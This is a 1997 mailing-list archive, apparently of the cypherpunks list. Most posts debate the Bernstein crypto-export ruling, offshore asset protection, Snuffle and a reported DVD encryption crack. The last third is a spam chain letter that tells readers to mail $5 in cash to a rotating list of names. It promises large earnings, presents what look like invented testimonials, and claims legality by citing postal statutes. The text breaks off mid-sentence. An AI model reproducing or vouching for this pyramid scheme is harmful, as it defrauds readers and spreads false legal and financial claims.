http://www.MediaINFO.com/ephome/news/newshtm/stories/082297n1.htm Yes, I'm sure that ICC members will feel more free to discuss controversial issues if their meeting is closed to the press. Meetings that are closed to the press are often run more efficiently and can reach concensus more quickly. Just ask any government official, bureaucrat, corporate or special interest executive, or dictator. They'll verify these practical advantages for keeping press out. I realize that the ICC is a private organization. It can do what it wants, including barring the press. But isn't it funny how the 'news' organizations involved plan to bar other 'news' organization so that they can discuss whether or not to deem who offers 'news'? Shame on all involved. _________________________________________________________ Vin Crosbie crosbie at well.com From frissell at panix.com Tue Aug 26 08:13:08 1997 From: frissell at panix.com (Duncan Frissell) Date: Tue, 26 Aug 1997 23:13:08 +0800 Subject: Jurisdiction Shopping In-Reply-To: <1.5.4.32.19970821161048.00743ce8@pop.pipeline.com> Message-ID: <3.0.2.32.19970826110642.03684e6c@panix.com> -----BEGIN PGP SIGNED MESSAGE----- At 01:00 PM 8/21/97 -0700, Tim May wrote: >Interestingly, many of the strategies for moving assets offshore, to >offshore banks and money havens, is not so much to evade taxes as to >"protect assets." Protect them from ransom/extortion demands of the _legal >profession_ sort, e.g., "deep pockets" lawsuits. For example, somebody >finds out that J. Random Cypherpunk is financially well off--perhaps from >the increasing number of online credit report records, etc.--and decides to >have a convenient "fall" on his property. He then sues for some large >amount, either covered by Homeowner's Insurance, or more. Foreign Asset Protection Trusts (FAPTs) have indeed become popular for protection against general lawsuit and dom rel liabilities. As long as not done in contemplation of bankruptcy, such transfers remain legal. Another popular reason is privacy in general. US domestic accounts can be examined by any federal, state, or local government employee who can sign his name to a subpeona. Any lawyer can also examine account records in the course of discovery proceedings. There are some limits to the above powers but not very substantial limits. For all we know, FINCEN has a nice Win32- based point and click browser that can tiptoe through every bank and brokerage account in America. If they don't have one yet, I'm sure they are trying to get one. If domestic lawyers or governments want the same sort of access to accounts in other jurisdictions, they have to spend many thousands of dollars and months or years of personnel time. Cuts down on their capabilities. DCF -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNALw/oVO4r4sgSPhAQE/9gP+NNns8O2bGM4gXa6gXQEGtTPzmAbpphVG DgKKn8/+PIK71TINx9bNQylur3Dqj6jiquQT8gKgx4D7oW5H2LHEK/V5mHrHB+e0 zLe3KrdSKfGYQoYLzMG5/WLftGYFVzDPNL+WDkEzQrzgBk+Ac4y1wTbvar8UL2nR XNlVHqw0cPE= =9cgI -----END PGP SIGNATURE----- From enoch at zipcon.net Tue Aug 26 08:13:37 1997 From: enoch at zipcon.net (Mike Duvos) Date: Tue, 26 Aug 1997 23:13:37 +0800 Subject: Reuter on Bernstein Ruling In-Reply-To: <1.5.4.32.19970826124158.006d5e64@pop.pipeline.com> Message-ID: <19970826150014.18696.qmail@zipcon.net> > Patel also issued a permanent injunction barring the government > from enforcing the regulations against plaintiff Daniel Bernstein or anyone > who sought to use, discuss or publish his encryption program. Now that Snuffle has been around for a while, it's obviously time for an upgrade. Might I suggest "Snuffle '95" with the DES, 3DES, RC5, and IDEA options. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From sunder at brainlink.com Tue Aug 26 08:17:33 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 26 Aug 1997 23:17:33 +0800 Subject: Bernstein decision In-Reply-To: <199708261343.GAA03055@toad.com> Message-ID: On Tue, 26 Aug 1997, John Gilmore wrote: > However you slice it, getting a Federal judge to declare both crypto > export control regimes unconstitutional is a major accomplishment. Happy, Happy, Joy! Joy! So does this mean we can freely export all crypto now? How soon before the EAR's get thrown out? =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From sunder at brainlink.com Tue Aug 26 08:31:45 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 26 Aug 1997 23:31:45 +0800 Subject: heart In-Reply-To: Message-ID: On Tue, 26 Aug 1997, Ray Arachelian wrote: > How's that again? Earlier you were saying that if any human considers > another human inhuman, all huamns lose humanity points, I showed an > example whereby all of humankind's inhumans action (by your model) would > calls all humanity - including the cop - to lose their humanity points to ^^^^^^^ cause Ayeeee! I've been infected by the Platypus virus!!! Someone hand me FProt quick! :) > the point of having negative humanity points therefore being human. Why > are cops an exception to this? =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From gnu at toad.com Tue Aug 26 08:34:36 1997 From: gnu at toad.com (John Gilmore) Date: Tue, 26 Aug 1997 23:34:36 +0800 Subject: Bernstein decision In-Reply-To: Message-ID: <199708261510.IAA04380@toad.com> > Happy, Happy, Joy! Joy! So does this mean we can freely export all crypto > now? How soon before the EAR's get thrown out? The Bernstein legal team is working on a definitive statement in a conference call this morning. As usual, talk to your own lawyer before doing anything rash. We put the decision up on the Web so you (and they) can read it and come to your own conclusions. See http://www.eff.org. John From nospam-seesignature at ceddec.com Tue Aug 26 08:34:53 1997 From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com) Date: Tue, 26 Aug 1997 23:34:53 +0800 Subject: Forbes article on Financial Cryptography is coming In-Reply-To: Message-ID: <97Aug26.111733edt.32258@brickwall.ceddec.com> On Mon, 25 Aug 1997, Robert Hettinga wrote: > It's out. Sameer made the cover of Forbes with a picture captioned "This > man wants to overthrow the government". If that is the case, he better hurry. "the government" will be obsoleted in about a decade :). On the other hand, he probably has been more persistent in the US than anyone else in hurrying this process of planned obsolecense. Marx's dialectic said the government would disappear after everything was communist. Cypherpunk's dialectic says the government will disappear after technology leaves it behind as an old relic of a barbaric past next to the divine right of kings. If there is a serpent in the new garden, it is that then we *MUST* govern ourselves - personally, and individually, and I don't know how many are capable of living virtuously. But at least the virtuous won't be taxed to subsidize the vicious. --- reply to tzeruch - at - ceddec - dot - com --- From whgiii at amaranth.com Tue Aug 26 08:39:32 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 26 Aug 1997 23:39:32 +0800 Subject: The true goal (was: Re: Bernstein decision) In-Reply-To: Message-ID: <199708261527.KAA13190@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In , on 08/26/97 at 11:04 AM, Ray Arachelian said: >On Tue, 26 Aug 1997, John Gilmore wrote: >> However you slice it, getting a Federal judge to declare both crypto >> export control regimes unconstitutional is a major accomplishment. >Happy, Happy, Joy! Joy! So does this mean we can freely export all crypto >now? How soon before the EAR's get thrown out? EAR has allways been a side issue. The true question should be: How soon before the bastards that supported EAR get thrown out? - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNALn3o9Co1n+aLhhAQE5xwP/XPezgg+gsabYBafX5bjdD4PYEr6LWdHb 8fageK/9m4LAFJFtbsZdPCBtPCfIR31tVHVp7ovMhrfMC6yPWVoAcB9th1AX4I2J 7iRdhHgiwAuqEBuAiRnHVSG2CoRyBb6uqcWKg6zsRys3sah/gTX2RxdOCvFEBHcB 2ctlUbXH2yM= =R3Uz -----END PGP SIGNATURE----- From attila at hun.org Tue Aug 26 09:06:35 1997 From: attila at hun.org (Attila T. Hun) Date: Wed, 27 Aug 1997 00:06:35 +0800 Subject: H/W v S/W encryption Constitutional challenge --The Next Generation In-Reply-To: <1.5.4.32.19970826140833.00860dd0@pop.pipeline.com> Message-ID: <199708261557.JAA17065@infowest.com> -----BEGIN PGP SIGNED MESSAGE----- "Experience keeps a dear school, but fools will learn in no other." --Benjamin Franklin IM[NSH]O, we need a test case that _differentiates_ between hardware encryption engines and _software_for_encryption (not to be confused with firmware). Patel rendered an important decision, but she refrained from establishing national jurisdiction; our only hope in this instance is further citations as to relevance. If it can be established, by extension of Patel's ruling that software is _always_ protected under the First Amendment (despite our government's well established track record of trying to kill free speech, or at least ignore it), the mere fact that it runs on a hardware engine --any engine, should be irrelevant. Carrying the argument to its absurd extreme, should we ban gasoline since it powers automobiles? --or even ban the publication of information on refueling an automobile? when confronted by fools {Clinton, et al], one must emphasize the absurdity, even inanity, of their foolishness. The whole argument must be expressed in terms which Judge Marilyn Patel found endearing. write the encryption software in Java which is [generally] a platform independent and portable human readable language. Perl, for instance the 3 line RSA algorithm for DC, is not exactly readable. Why not construct an SBC with extended memory, small hard disk, an O/S which supports Java, and I/O means --then, apply for an export permit for the hardware, the Java encryption/decryption software, and the combined unit? If the burrowcrats at Commerce respond in typical fashion, file in SF Federal Court; if they procrastinate and obfuscate to avoid the inevitable, file in SF to pry it out of their grubby hands and get on with it. The criminals in Congress always pass the right way in public, then hose us over with manager's marks and all that falderol in reconciliation, justifying their position that they have given the Congress a choice [between good and evil? --no, between worse and worst]. Therefore, let's present the Court with the two [or three] part challenge --and make sure the hardware, the combined hardware and software, and the software alone, are distinct claims so that even if the justices choose to classify the hardware/software "package" as a munition, the standalone software will fall under Patel's ruling (more like guidance). The Feds will look pretty stupid ruling a general purpose Java enabled SBC black box a munition.... let's go get the bastards using their own techniques. TAKE THE WAR HOME TO THEM, on their own turf! until Bernstein, all of our actions have been essentially defensive (Junger non-withstanding). Issues must be reduced to the lowest common denominator --let's teach that class of misfits, the ship of fools. ______________________________________________________________________ "attila" 1024/C20B6905/23 D0 FA 7F 6A 8F 60 66 BC AF AE 56 98 C0 D7 B0 on or about 970826:1008 John Young expostulated: +Declan wrote: +>I think that's about right. One of the important questions was how broadly +>Patel would rule, whether her ruling would apply just to Bernstein & +>associates or whether she would enjoin the government from enforcing +>ITAR/EAR at all. +> +>Unfortunately, she chose the former. But look on the bright side: her +>narrow decision may be less likely to be reversed, no? +Does this not shift now to Peter Junger's suit: same issues, broader +challenge, same opposing arguments? Did Patel rule narrowly in +Bernstein to set the stage for the broader case in the works? +BTW, is there a suit being readied to follow Peter's? Karn II? PRZ 6.0? +What say, Peter, Lee, Cindy, Phil, Phil, Anthony et al? -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: latin1 Comment: No safety this side of the grave. Never was; never will be iQCVAwUBNAL7/L04kQrCC2kFAQGh9wP/ZC3mSfm3l1FPRsejYimfXaZeLu7KcDuF Evfe40TrCRSSe+ZBfduuSlBxslCTAWtTcdYn+uc+JelyDJ0kysZKge7OUG5HEnHO 1U0P1gqP/rY0OnQf9Z0Zr4xEQlsIzNRTYp/bLPYtcBGF7i1pg5/2mU8bbObrs7Wr d6sA4IhN8as= =CwjL -----END PGP SIGNATURE----- From frissell at panix.com Tue Aug 26 09:14:13 1997 From: frissell at panix.com (Duncan Frissell) Date: Wed, 27 Aug 1997 00:14:13 +0800 Subject: The Gift of Stern Angels Message-ID: <3.0.2.32.19970826120654.00699cf4@panix.com> -----BEGIN PGP SIGNED MESSAGE----- I'm reading "The Gift of Stern Angels" by Michael Moriarty. It is a memoir of how one hour with Janet Reno in a Washington DC hotel in 1993 turned the star of Law and Order from a Clinton voter into a very independent libertarian, a black-listed Hollywood pariah, and an exile to Canada. [No they were just talking.] Moriarty, who had voted for Clinton in 1992, was invited to a meeting on television violence between the AG and TV execs in the Ulysses S. Grant Suite of the Willard Hotel on November 18th 1993. The AG said that a show like "Murder She Wrote" even though it didn't show violence on screen was troubling because it dwelt on the instrumentalities of violence. Following the meeting, Moriarty publicly attacked the Administration, was fired from Law and Order, was unable to work in Hollywood (save for one appearance in Courage Under Fire), got divorced, and fled to Halifax. He had favored a ban on "assault rifles" but he now moved to Canada because he feared that if he stayed in the US he would feel compelled to take up the gun. The book has tons of great free speech quotes. "In 3,000 years of human history, no one has ever dared to come to the conclusion that the fight scenes in Romeo and Juliet provoked the death of Christopher Marlowe." It's not published in the US. I ordered mine from the Book Room (North America's oldest bookstore) in Halifax. 1-800-387-BOOK (2665). DCF -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNAL/A4VO4r4sgSPhAQHpPwQAmN35NeRTIJkKAYcoZAWj1Ep0ZS5gm7hn aq+Fo+2THe1ACiL/P1wgiwO5+Jn5MZJsD8leg2zyFjjdKG+MhkPZ4qk1ciH1hmmb 8z+IBqE5HQu2rgyIfmQg/wkbcj9zcFnhJ4Bk00mQDm2BXZ5eUBfFMcGmFjGOUU3B nLuvD08I3uI= =AsiU -----END PGP SIGNATURE----- From jya at pipeline.com Tue Aug 26 09:26:59 1997 From: jya at pipeline.com (John Young) Date: Wed, 27 Aug 1997 00:26:59 +0800 Subject: Reuter on Bernstein Ruling Message-ID: <1.5.4.32.19970826160822.006e89a4@pop.pipeline.com> Is Snuffle on line anywhere now? If not, anyone got a source? Or is Dan reserving the honor? From kent at songbird.com Tue Aug 26 09:30:38 1997 From: kent at songbird.com (Kent Crispin) Date: Wed, 27 Aug 1997 00:30:38 +0800 Subject: lack of evolutionary pressures In-Reply-To: <199708231347.IAA24308@einstein.ssz.com> Message-ID: <19970826091948.12144@bywater.songbird.com> On Sat, Aug 23, 1997 at 08:47:03AM -0500, Jim Choate wrote: > Forwarded message: > > > Date: Fri, 22 Aug 1997 22:42:34 -0700 > > From: Kent Crispin > > Subject: Re: lack of evolutionary pressures (was Re: An end to "court appointed attorneys") > > > The evolutionary definition of "competent" is "propagate your genetic > > material". A rough corollary is that those who raise the most children > > to child-bearing age are the most competent. > > With all due respect, bullshit. Fecundity is in no way related to long-term > survival as detailed in the various theories of Neo-Darwinian evolution or > in actual studies. Note that I didn't say "fecundity". And note also that I said "rough corollary". Furthermore, it is simply false to state that "fecundity is in no way related etc etc". A dominant gene that causes a fecundity of zero, for example, will not propagate. [...] > Also note that Mayr has a new book out (about a year old I believe) that > covers some of the most recent changes of the punctuated-equilibria and > neo-darminian camps. Thanks -- I will look into it. I know of Dr Mayr's work from other sources, but I didn't know he had a new book out. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From declan at well.com Tue Aug 26 10:18:03 1997 From: declan at well.com (Declan McCullagh) Date: Wed, 27 Aug 1997 01:18:03 +0800 Subject: Stewart Baker on Bernstein encryption decision (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 26 Aug 1997 10:02:09 -0700 (PDT) From: Declan McCullagh To: fight-censorship-announce at vorlon.mit.edu Subject: Stewart Baker on Bernstein encryption decision ---------- Forwarded message ---------- Date: Tue, 26 Aug 97 11:51:37 EST From: Stewart Baker To: fight-censorship-announce at vorlon.mit.edu, declan at well.com Subject: Re: FC: John Gilmore to cypherpunks on Bernstein decision Declan-- John is entitled to brag about the Bernstein decision, but getting the Department of State to "RWA" all of its pending license applications is nothing to brag about. It cost a lot of companies a lot of money, time, and sales while they resubmitted the same applications to the Commerce Department. I said at the time that State's advice to crypto exporters in those last few weeks was "Get your tongue out of my mouth, I'm kissing you good-bye." Perhaps the cause of this action was the lawsuit, perhaps it was spite at the crypto exporters who lobbied for a change in jurisdiction, but whatever the cause, it was not a good thing for anybody who is actually in the crypto business. Stewart ______________________________ Reply Separator _________________________________ Subject: FC: John Gilmore to cypherpunks on Bernstein decision Author: declan at well.com at INTERNET Date: 8/26/97 10:38 AM From jya at pipeline.com Tue Aug 26 10:32:04 1997 From: jya at pipeline.com (John Young) Date: Wed, 27 Aug 1997 01:32:04 +0800 Subject: Snuffle Message-ID: <1.5.4.32.19970826170943.00838498@pop.pipeline.com> Dan Bernstein's 1990 presentation of Snuffle on sci.crypt is available at: ftp://coast.cs.purdue.edu/pub/tools/unix/snuffle.shar Dan writes, "Don't you dare send this outside the US without checking with the appropriate agencies." It's a kick, Dan, to send it, without having to check, thanks to you and team, at: http://jya.com/snuffle.txt From whgiii at amaranth.com Tue Aug 26 10:54:54 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Wed, 27 Aug 1997 01:54:54 +0800 Subject: Stewart Baker on Bernstein encryption decision (fwd) In-Reply-To: Message-ID: <199708261737.MAA15155@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In , on 08/26/97 at 10:03 AM, Declan McCullagh said: >---------- Forwarded message ---------- >Date: Tue, 26 Aug 97 11:51:37 EST >From: Stewart Baker >To: fight-censorship-announce at vorlon.mit.edu, declan at well.com Subject: >Re: FC: John Gilmore to cypherpunks on Bernstein decision > >Declan-- >John is entitled to brag about the Bernstein decision, but getting the >Department of State to "RWA" all of its pending license applications is >nothing to brag about. It cost a lot of companies a lot of money, time, >and sales while they resubmitted the same applications to the Commerce >Department. >I said at the time that State's advice to crypto exporters in those last >few weeks was "Get your tongue out of my mouth, I'm kissing you >good-bye." >Perhaps the cause of this action was the lawsuit, perhaps it was spite at >the crypto exporters who lobbied for a change in jurisdiction, but >whatever the cause, it was not a good thing for anybody who is actually >in the crypto business. >Stewart Well I for one hope the Commerce Dept will deny all applications for export. It is time that the computer industry combined forced and let the piggies in DC know that they aren't going to take this shit anymore. I am curious just who overseas they are selling watered down crypto to anyhow. Is this information available via Foia? Perhaps we should start a mailing campagne to these companies of the dangers of using weak crypto and give them pointers to overseas companies that can provide them with strong crypto solutions. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBNAMGWo9Co1n+aLhhAQGJNQP/eA/EoWmy6558gU/J3T7JZKNVG21b1Vex +87Qc0Qz0LCq7aKXFMxjdAFPHDmtkipmaJGiK8sIvaOPl5+QY+bU/G7NgEjF0BCx R41sOicz9bnpXKss71LquIVsBMC4QKrNm3xGASHudESCpMITaK+1NQChDNoQYKAE 0RFd90Kfma8= =uAXr -----END PGP SIGNATURE----- From hua at chromatic.com Tue Aug 26 11:07:47 1997 From: hua at chromatic.com (Ernest Hua) Date: Wed, 27 Aug 1997 02:07:47 +0800 Subject: need confirmation of DVD/CSS crack in China ... Message-ID: <199708261758.KAA25147@ohio.chromatic.com> Is this true? Does anyone have confirmation of this crack? Or is C/NET being a bit liberal on word choice? Ern > full article: http://www.news.com/News/Item/0,4,13651,00.html > > Hundreds of films come to DVD > By Michael Kanellos > August 22, 1997, 4:35 p.m. PT > > UPDATE A raft of new DVD movies from major Hollywood studios could provide a > boost to the fledgling digital video disc industry, which has been in dire > need of more titles. > > < lines deleted > > > Third, the entertainment industry giants will have to improve and agree on > an encryption technology. The current 40-bit encryption standard used on DVD > discs, which is supposed to stop copyright pirates, has already been cracked > in China. Stronger encryption, however, forces PCs and players to run at a > crawl. Partially as a result, Fox, Paramount, and Disney have not committed > to producing materials on DVD, Burdon noted. > > < lines deleted > From noegu at bizproplus.com Wed Aug 27 02:40:00 1997 From: noegu at bizproplus.com (The Easiest Way to Make Money With Your Computer) Date: Wed, 27 Aug 1997 02:40:00 -0700 (PDT) Subject: Introducing Goldrush Stealth Mailer -- Plus 40 Million Prospects! Message-ID: <199708274027BAA17053@199702161035.GAA08056@bizproplus..worldnet.att.net> ************************************************** *******HOW TO MAKE MONEY WITH YOUR COMPUTER******* ************************************************** Did you know that 50 to 65% of ALL goods and services are expected to be sold through multi-level methods by the year 2000? This is a MULTI-BILLION DOLLAR industry and of the 500,000 million- aires in the U.S., 20% (100,000) made their fortune in MLM in the LAST SEVEN YEARS. Statistics also show that 45 people become millionaires EVERY DAY through multi-level marketing! Would YOU like to get a piece of the pie? NOW YOU CAN! With this HOT, NEW money-generating program you can use current technologies to achieve FINANCIAL FREEDOM! Electronic Multi- Level Marketing is taking the internet by storm, leaving the OLD MLM systems behind! JOIN THIS PROGRAM NOW, before YOU get left behind too! IT'S VERY SIMPLE TO DO! ANYONE can be SUCCESSFUL with this program! As you read this entire program thoroughly, keep in mind that APPROXIMATELY 50,000 NEW people join the internet community EVERY SINGLE MONTH! You are looking at the most profitable and unique program you may ever see. It has demonstrated and proven ability to generate large sums of money. This program is showing fantastic appeal with a huge and ever growing population which needs additional income. This is a legitimate money-making opportunity. It does not require you to come in contact with people, do any hard work, and best of all, you never have to leave the house, except to get the mail. If you believe that some day you will get that lucky break that you have been waiting for, THIS IS IT! Simply follow the easy instructions, and your dream will come true! This electronic multi-level marketing program works perfectly...100% EVERY TIME! Thousands of people have used this program to raise capital to start their own business, pay off debts, buy homes, cars, etc., even retire! This is your chance, so don't pass it up. IT WILL WORK FOR YOU, if you carefully follow the instructions and apply these next four points: 1. INSIGHT: It is necessary to see the GREAT possibilities that this marketing program contains. Read it several times, then later read it again! Calculate the numbers for yourself; you will see the amazing results that can be obtained. 2. INVESTMENT: Not in anyone else, but yourself. Every endeavor which produces a profit requires some degree of investment, be it time, money, resources, etc. For the potential gain that can come to you, this investment is quite insignificant. 3. APPLICATION: There is no such thing as a "FREE LUNCH". Even this opportunity requires some effort and time. Every successful venture does. 4. PATIENCE: After you have accomplished the steps described, the program requires a little time before showing a good response. As it enters the 1st, 2nd, 3rd, and finally the 4th level of response, there is a time element that to some could be a bit aggravating without giving proper thought to HOW the program works, and it does work! You must allow 20 to 90 days...so be patient! "ALL THINGS COME TO THOSE WHO WAIT! WHAT ARE SOME OF THE REASONS A PERSON MIGHT NOT JOIN THIS PROGRAM NOW? Here are a few: 1. Some believe they can never make big money with anything. 2. Some believe they will be ridiculed for trying. 3. Some must be driven, because they can start nothing by, or for themselves. 4. Some are plain lazy! 5. A few think they will be cheated out of a few dollars. What could be your reason for not joining now? The system WORKS, if you DO it. You have right here in front of you a tried and proven method to get all of the money you will ever need or want. If you don't take the next step you will never get the first dollar. DO IT NOW! OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC MULTI-LEVEL MARKETING PROGRAM Basically, this is what we do: We sell thousands of people a product for $5.00 that costs us next to nothing to produce and e-mail. As with all multi-level businesses, we build our business by recruiting new partners and selling our products. Every state in the U.S. allows you to recruit new multi- level business online (with your computer). The product in this program is a series of four business and financial reports. Each $5.00 order you recieve by "snail mail" will include the e-mail address of the sender. To fill each order, you simply e-mail the product to the buyer. THAT'S IT!...the $5.00 is yours! This is the GREATEST electronic multi-level marketing business anywhere! FOLLOW THE INSTRUCTIONS EXACTLY! Let's face it, the profits are worth it! THEY'RE TREMENDOUS!!! So go for it. Remember the 4 points and we'll see YOU at the top! ******* I N S T R U C T I O N S ******* This is what you MUST do: 1. Order all four reports listed and numbered from the list below. For each report send $5.00 CASH, YOUR E-MAIL ADDRESS and YOUR RETURN POSTAL ADDRESS (incase of a problem) to each person listed. When you order, make sure you request each SPECIFIC report. You will need all four reports, because you will be saving them on your computer and reselling them. 2. IMPORTANT--DO NOT alter the names, or their sequence other than instructed in this program! Replace the name and address under REPORT #1 with yours, moving the one that was there down to REPORT #2. Move the name and address under REPORT #2 to REPORT #3. Move the name and address under REPORT #3 to REPORT #4. The name and address that was under REPORT #4 is dropped off the list and is NO DOUBT on the way to the bank. When doing this, please make certain you copy everyone's name and address ACCURATELY!!! Also, DO NOT move the Report/Product positions! 3. Take this entire program text, including the corrected names list, and save it on your computer. 4. Now you're ready to start a massive advertising campaign on the WORLDWIDE WEB! Advertising on the WEB is very, very inexpensive, but there are HUNDREDS of FREE places to advertise also. Another avenue which you could use is e-mail mailing lists. You can buy these lists for under $20/1,000 addresses. START YOUR AD CAMPAIGN AS SOON AS YOU CAN. HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$ Let's say you decide to start small just to see how it goes. Assume your goal is to get 10 people to participate on your first level. (Placing a lot of FREE ads on the internet could EASILY get a better response.) Also assume that everyone else in YOUR BUILDING ORGANIZATION gets ONLY 10 downline members. Follow this example for the STAGGERING results below. 1st level--your 10 members with $5 $50 2nd level--10 members from those 10 ($5 x 100) $500 3rd level--10 members from those 100 ($5 x 1,000) $5,000 4th level--10 members from those 1,000 ($5 x 10,000) $50,000 THIS TOTALS-----------> $55,550 Remember friends, this is assuming that the people who participate only recruit 10 people each. Dare to think for a moment what would happen if everyone got 20 people to participate! Some people get 100's of recruits! THINK ABOUT IT! REMEMBER: Approx. 50,000 new people get online monthly! ORDER YOUR REPORTS NOW!!! Always send YOUR E-MAIL ADDRESS and RETURN POSTAL ADDRESS (incase of any problems) with $5 CASH (concealed) in your order for each report. Order each report by NAME and NUMBER. REPORT #1: "MARKETING YOUR BUSINESS ON-LINE" Order this report from: Ray Ford P.O. Box 80742 Baton Rouge, LA 70808 USA REPORT #2 "ADVERTISE FREE ON THE INTERNET" Order this report from: Randy Head P.O. BOX 402 Maryville, MO 64468 USA REPORT #3 "A SUPER MARKETING STRATEGY" Order this report from: Paul Bilek P.O. BOX 1150 Harrow, Ontario N0R 1G0 Canada REPORT #4 "POWERFUL MARKETING TOOLS" Order this report from: Michael Cline 3401 N. 56th St. Phoenix, Arizona 85018 USA *******TIPS FOR SUCCESS******* TREAT THIS AS YOUR BUSINESS! Send for the four reports IMMEDIATELY, so you will have them when the orders start coming in because: When you recieve a $5 order, you MUST send out the requested product/ report to comply with the U.S. Postal & Lottery Laws, Title 18, Sections 1302 and 1341 or Title 18, Section 3005 in the U.S. Code, also Code of Federal Regs. vol. 16, Sections 255 and 436, which state that "a product or service must be exchanged for money recieved." * ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECIEVE. * Be patient and persistent with this program. If you follow the instructions exactly the results WILL undoubtedly be SUCCESS! * ABOVE ALL, HAVE FAITH IN YOURSELF THAT YOU CAN SUCCEED! *******YOUR SUCCESS GUIDELINE******* The check point that guarantees your success is simply this: You MUST recieve 10 to 20 orders for REPORT #1! THIS IS A MUST! If you don't within two weeks, advertise more and send out more programs until you do. Then, a couple of weeks later you should recieve at least 100 orders for REPORT #2. If you don't, advertise more and send out more programs until you do. Once you have recieved 100, or more orders for REPORT #2, YOU CAN RELAX, because you will be on your way to the BANK! -OR- You can DOUBLE your efforts! REMEMBER: Everytime your name is moved down on the list you are in front of a DIFFERENT report, so you can KEEP TRACK of your PROGRESS by what report people are ordering from you. IT'S THAT EASY!!! NOTE: IF YOU NEED HELP with starting a business, registering a business name, how income tax is handled, etc., contact your local office of the Small Business Administration (a Federal agency) for free help and answers to questions. Also, the Internal Revenue Service offers free help via telephone and free seminars about business taxes. ******* T E S T I M O N I A L S ******* This program does work, but you must follow it EXACTLY! Especially the rule of not trying to place your name in a different position, it won't work, you'll lose a lot of money. I'm living proof that it works. It really is a great opportunity to make relatively easy money, with little cost to you. If you do choose to participate, follow the program exactly, and you'll be on your way to financial security. If you are a fellow Christian and are in financial trouble like I was, consider this a sign. I DID! Good Luck & God Bless You, Sincerely, Chris Johnson P.S. Do you have any idea what 11,700 $5 bills ($58,500) looks like piled up on the kitchen table?...IT'S AWESOME! My name is Frank. My wife Doris and I live in Bel-Air, MD. I am a cost accountant with a major U.S. Corporation and I make pretty good money. When I recieved the program I grumbled to Doris about recieving "junk mail"! I made fun of the whole thing, spouting my knowledge of the population and percentages involved. I "knew" it wouldn't work. Doris totally ignored my supposed intelligence and jumped in with both feet. I made merciless fun of her, and was ready to lay the old "I told you so" on her when the thing didn't work... well, the laugh was on me! Within two weeks she had recieved over 50 responses. Within 45 days she had recieved over $147,200 in $5 bills! I was stunned. I was sure that I had it all figured and that it wouldn't work...I AM a believer now. I have joined Doris in her "little" hobby. I did have seven more years until retirement, but I think of the "rat race" and it's not for me...We owe it all to MLM. Frank T., Bel-Air, MD I just want to pass along my best wishes and encouragement to you. Any doubts you have will vanish when your first orders come in. I even checked with the U.S. Post Office to verify that the plan was legal. It definitely is! IT WORKS!!! Paul Johnson, Raleigh, NC This is the only realistic money-making offer I've ever recieved. I participated because this plan truly makes sense. I was surprised when the $5.00 bills started filling my mail box. By the time it tapered off I had recieved over 8,000 orders with over $40,000 in cash. Dozens of people have sent warm personal notes too, sharing the news of their good fortunes! It's been WONDERFUL. Carl Winslow Tulsa, OK The main reason for this letter is to convince you that this system is honest, lawful, extremely profitable, and is a way to get a large amount of money in a short time. I was approached several times before I checked this out. I joined just to see what one could expect in return for the minimal effort and money required. Initially I let no one in the organization know that I was an attorney and, to my astonishment, I recieved $36,470.00 in the first 14 weeks, with money still coming in. Sincerely yours, Phillip A. Brown This plan works like GANG-BUSTERS!!! So far I have had 9,735 total orders...OVER $48,000!!! I hope I have sparked your own excitement, if you follow the program exactly, you could have the same success I have, if not better. Your success is right around the corner, but you must do a little work. Good Luck! G. Bank Not being the gambling type, it took me several weeks to make up my mind to participate in this plan. But conservative that I am I decided that the initial investment was so little that there was just no way that I wouldn't get enough orders to at least get my money back. Boy I was surprised when I found my medium-size post office box crammed with orders. After that it got so over-loaded that I had to start picking up my mail at the window. I'll make more money this year than any 10 years of my life before. The nice thing about this deal is 